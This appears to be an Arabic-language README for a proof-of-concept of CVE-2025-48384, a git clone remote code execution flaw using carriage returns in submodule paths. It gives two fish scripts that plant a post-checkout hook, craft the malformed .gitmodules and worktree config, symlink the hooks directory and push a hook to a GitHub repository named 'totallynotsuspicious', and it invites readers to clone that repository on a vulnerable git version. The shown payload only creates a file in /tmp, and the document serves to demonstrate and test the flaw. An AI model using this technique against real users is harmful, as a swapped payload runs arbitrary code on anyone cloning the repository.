
نص استنساخ لـ CVE-2025-48384، وهو ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) في git clone عبر حرف الإرجاع (carriage return) في مسارات الوحدات الفرعية (submodules)، مما يوضح الثغرة ويوفر بيئة اختبار محلية.
إعادة إنتاج من https://dgl.cx/2025/07/git-clone-submodule-cve-2025-48384. كل الشكر لديفيد ليدبيتر.
هذه محاولة إعادة إنتاج أساسية للثغرة.
لتفعيلها، قم بتنفيذ git clone --recursive https://github.com/acheong08/CVE-2025-48384 على إصدار ضعيف من git وستجد ملف /tmp/fishsucks يظهر فجأة.
تمكنت من إعادة الإنتاج على إصدار git 2.50.0.
فيما يلي النص البرمجي المستخدم للاختبار محليًا.
#!/usr/bin/fish
git init sub
echo '#!/usr/bin/env bash
touch /tmp/fishsucks
' > sub/post-checkout
chmod +x sub/post-checkout
git -C sub add post-checkout
git -C sub commit -m hook
git init repo
git -C repo -c protocol.file.allow=always submodule add "$PWD/sub" sub
git -C repo mv sub (printf "sub\r")
git config unset -f repo/.gitmodules submodule.sub.path
printf "\tpath = \"sub\r\"\n" >> repo/.gitmodules
git config unset -f repo/.git/modules/sub/config core.worktree
printf "[core]\n\tworktree = \"../../../sub\r\"\n" >> repo/.git/modules/sub/config
ln -s .git/modules/sub/hooks repo/sub
git -C repo add -A
git -C repo commit -m submodule
git -c protocol.file.allow=always clone --recurse-submodules repo bad-clone
not test -f "/tmp/fishsucks"
rm -rf ./repo ./sub ./bad-clone
نص برمجي معدّل للرفع إلى Github:
#!/usr/bin/fish
if not test -d sub
git clone https://github.com/acheong08/totallynotsuspicious.git sub
else
git -C sub pull
end
echo '#!/usr/bin/env bash
touch /tmp/fishsucks
' > sub/post-checkout
chmod +x sub/post-checkout
git -C sub add post-checkout
git -C sub commit -m hook; or true
git -C sub push origin HEAD
rm -rf repo
git init repo
git -C repo -c protocol.file.allow=always submodule add https://github.com/acheong08/totallynotsuspicious.git sub
git -C repo mv sub (printf "sub\r")
git config unset -f repo/.gitmodules submodule.sub.path
printf "\tpath = \"sub\r\"\n" >> repo/.gitmodules
git config unset -f repo/.git/modules/sub/config core.worktree
printf "[core]\n\tworktree = \"../../../sub\r\"\n" >> repo/.git/modules/sub/config
ln -s .git/modules/sub/hooks repo/sub
git -C repo add -A
git -C repo commit -m submodule
git -c protocol.file.allow=always clone --recurse-submodules repo bad-clone
not test -f "/tmp/fishsucks"